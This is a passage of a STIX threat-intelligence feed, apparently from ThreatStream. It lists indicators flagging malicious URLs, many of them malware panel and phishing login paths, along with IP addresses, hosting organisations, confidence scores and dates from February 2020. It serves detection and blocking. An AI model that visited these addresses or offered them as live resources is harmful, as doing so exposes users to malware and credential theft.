CyberCrime","id":"indicator--53d3da3c-985b-4045-bb67-cac32740c8a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:52:43.45Z","name":"mal_url: http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:43.45Z"} +{"created":"2020-02-23T02:52:44.281Z","description":"TS ID: 55342497255; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--19faa6b5-809f-4a97-9415-10aa8711a095","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-23T02:52:44.281Z","name":"mal_url: http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:44.281Z"} +{"created":"2020-02-23T02:52:46.455Z","description":"TS ID: 55342497238; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--f023fd7f-9128-4b43-b8a4-4e18a33dbbf0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:52:46.455Z","name":"mal_url: http://f0405406.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0405406.xsph.ru/login']","type":"indicator","valid_from":"2020-02-23T02:52:46.455Z"} +{"created":"2020-02-23T02:52:55.747Z","description":"TS ID: 55342497297; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--15290dad-dffe-413d-b14c-e1bcbf9c5f62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:52:55.747Z","name":"mal_url: http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:55.747Z"} +{"created":"2020-02-23T02:53:08.502Z","description":"TS ID: 55342497311; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--d04b02bf-6282-4889-95d0-bcebf5f7f3a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:53:08.502Z","name":"mal_url: http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:08.502Z"} +{"created":"2020-02-23T02:53:08.537Z","description":"TS ID: 55342497243; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--b3da183c-cefb-4014-bc60-b838648be7b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-23T02:53:08.537Z","name":"mal_url: http://mez.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mez.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-23T02:53:08.537Z"} +{"created":"2020-02-23T02:53:08.568Z","description":"TS ID: 55342497237; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f18c4197-55ad-4dba-beaf-8b57fd984245","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-23T02:53:08.568Z","name":"mal_url: http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:08.568Z"} +{"created":"2020-02-23T02:53:09.543Z","description":"TS ID: 55342497304; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a11a5e52-cd1d-4891-96a6-a9b78a260843","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:09.543Z","name":"mal_url: http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:09.543Z"} +{"created":"2020-02-23T02:53:09.578Z","description":"TS ID: 55342497256; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--a5c5b970-919b-4464-b7db-694194d08632","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:53:09.578Z","name":"mal_url: http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:09.578Z"} +{"created":"2020-02-23T02:53:09.612Z","description":"TS ID: 55342497234; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--60a33c8d-316e-4688-b9f8-e68c82aa36b3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:09.612Z","name":"mal_url: http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:09.612Z"} +{"created":"2020-02-23T02:53:12.354Z","description":"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:53:12.354Z","name":"mal_url: http://f0405230.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0405230.xsph.ru/login']","type":"indicator","valid_from":"2020-02-23T02:53:12.354Z"} +{"created":"2020-02-23T02:53:17.566Z","description":"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:53:17.566Z","name":"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:17.566Z"} +{"created":"2020-02-23T02:53:19.805Z","description":"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ebf656cd-162d-40e8-8c3a-272285600583","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:53:19.805Z","name":"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:19.805Z"} +{"created":"2020-02-23T02:53:27.698Z","description":"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-23T02:53:27.698Z","name":"mal_url: http://193.142.59.109/primone/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.109/primone/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.698Z"} +{"created":"2020-02-23T02:53:27.735Z","description":"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ff626727-4888-4cba-9257-470f0a70891a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:27.735Z","name":"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.735Z"} +{"created":"2020-02-23T02:53:40.401Z","description":"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:40.401Z","name":"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.401Z"} +{"created":"2020-02-23T02:53:40.432Z","description":"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9d14574f-9af7-493d-84a2-f631570f1940","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-23T02:53:40.432Z","name":"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.432Z"} +{"created":"2020-02-23T02:53:40.453Z","description":"TS ID: 55342497232; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--e6333eb1-1ff7-4131-94cd-5e5d53bff58f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:53:40.453Z","name":"mal_url: http://mactreher.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mactreher.ru/login']","type":"indicator","valid_from":"2020-02-23T02:53:40.453Z"} +{"created":"2020-02-23T02:53:42.405Z","description":"TS ID: 55342497305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c5e5054b-f15b-4c96-a753-3b3562f66488","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:42.405Z","name":"mal_url: http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:42.405Z"} +{"created":"2020-02-23T02:53:42.443Z","description":"TS ID: 55342497235; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d672c0ee-1501-4276-bd9d-dbdd27a11a7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:42.443Z","name":"mal_url: http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:42.443Z"} +{"created":"2020-02-23T02:53:47.65Z","description":"TS ID: 55342497244; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9ebd5fa7-5308-48f6-80a2-84c18572d4b6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-23T02:53:47.65Z","name":"mal_url: http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:47.65Z"} +{"created":"2020-02-23T02:53:53.437Z","description":"TS ID: 55342497268; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--e00da1fa-88c4-4327-b415-71d3499ab5d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:53.437Z","name":"mal_url: http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:53.437Z"} +{"created":"2020-02-23T02:54:02.069Z","description":"TS ID: 55342497250; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--6d4b1407-6885-4030-beae-43747e458b8a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:02.069Z","name":"mal_url: http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:02.069Z"} +{"created":"2020-02-23T02:54:09.172Z","description":"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:09.172Z","name":"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:09.172Z"} +{"created":"2020-02-23T02:54:15.807Z","description":"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--27b834b0-4113-4eca-8989-d7ada85d0779","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:15.807Z","name":"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:15.807Z"} +{"created":"2020-02-23T02:54:17.76Z","description":"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56334c71-2f84-4e09-a6cc-017577b99970","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:17.76Z","name":"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:17.76Z"} +{"created":"2020-02-23T02:54:19.374Z","description":"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:19.374Z","name":"mal_ip: 162.144.13.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.13.146']","type":"indicator","valid_from":"2020-02-23T02:54:19.374Z"} +{"created":"2020-02-23T02:54:25.477Z","description":"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--8b4fe873-9b07-4985-9818-291623fc07b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-23T02:54:25.477Z","name":"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:25.477Z"} +{"created":"2020-02-23T02:54:39.696Z","description":"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:39.696Z","name":"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.696Z"} +{"created":"2020-02-23T02:54:39.976Z","description":"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0748270e-f010-4598-a389-553d3fffcb48","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:39.976Z","name":"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.976Z"} +{"created":"2020-02-23T02:54:40.035Z","description":"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-23T02:54:40.035Z","name":"mal_ip: 202.67.10.173","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '202.67.10.173']","type":"indicator","valid_from":"2020-02-23T02:54:40.035Z"} +{"created":"2020-02-23T02:54:40.281Z","description":"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:54:40.281Z","name":"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:40.281Z"} +{"created":"2020-02-23T02:54:48.232Z","description":"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-23T02:54:48.232Z","name":"mal_ip: 50.116.87.108","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '50.116.87.108']","type":"indicator","valid_from":"2020-02-23T02:54:48.232Z"} +{"created":"2020-02-23T02:54:53.263Z","description":"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:53.263Z","name":"mal_url: http://193.142.59.96/africa/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.96/africa/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:54:53.263Z"} +{"created":"2020-02-23T02:54:54.071Z","description":"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:54.071Z","name":"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:54.071Z"} +{"created":"2020-02-23T02:55:00.871Z","description":"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:55:00.871Z","name":"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.871Z"} +{"created":"2020-02-23T02:55:00.907Z","description":"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:55:00.907Z","name":"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.907Z"} +{"created":"2020-02-23T02:55:00.94Z","description":"TS ID: 55342497242; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--6cfdb5ac-7f06-48e6-9ba6-67ade05e01d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:55:00.94Z","name":"mal_url: http://ovdoker.myjino.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ovdoker.myjino.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.94Z"} +{"created":"2020-02-23T02:55:03.894Z","description":"TS ID: 55342497264; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f48e2a6f-9af6-4b9c-b9a7-e2775d552731","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:55:03.894Z","name":"mal_url: http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:03.894Z"} +{"created":"2020-02-23T02:55:15.714Z","description":"TS ID: 55342497314; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a3c0fc0a-ae59-495a-a9cc-b2dfe9a494ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:55:15.714Z","name":"mal_url: http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:15.714Z"} +{"created":"2020-02-24T02:54:25.932Z","description":"TS ID: 55344292231; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--abe3e442-e923-4ad1-b4cb-3695a954a2a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-24T02:54:25.932Z","name":"mal_url: http://saind.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://saind.myjino.ru/login']","type":"indicator","valid_from":"2020-02-24T02:54:25.932Z"} +{"created":"2020-02-25T02:52:18.371Z","description":"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--c19c0ccc-9df8-4804-83da-1c469d220574","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:18.371Z","name":"mal_url: http://farsson.com/~zadmin/7/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/7/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:18.371Z"} +{"created":"2020-02-25T02:52:27.703Z","description":"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:27.703Z","name":"mal_url: http://farsson.com/~zadmin/14/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/14/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.703Z"} +{"created":"2020-02-25T02:52:27.729Z","description":"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--952cf095-32f4-4b10-8680-499ccd9f784f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:27.729Z","name":"mal_url: http://pabloemino.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pabloemino.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.729Z"} +{"created":"2020-02-25T02:52:27.765Z","description":"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime","id":"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-02-25T02:52:27.765Z","name":"mal_url: http://37.72.168.165/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://37.72.168.165/login']","type":"indicator","valid_from":"2020-02-25T02:52:27.765Z"} +{"created":"2020-02-25T02:52:27.808Z","description":"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime","id":"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:27.808Z","name":"mal_ip: 185.154.52.251","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.154.52.251']","type":"indicator","valid_from":"2020-02-25T02:52:27.808Z"} +{"created":"2020-02-25T02:52:37.329Z","description":"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:52:37.329Z","name":"mal_ip: 194.87.146.180","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.146.180']","type":"indicator","valid_from":"2020-02-25T02:52:37.329Z"} +{"created":"2020-02-25T02:52:38.025Z","description":"TS ID: 55347597663; iType: 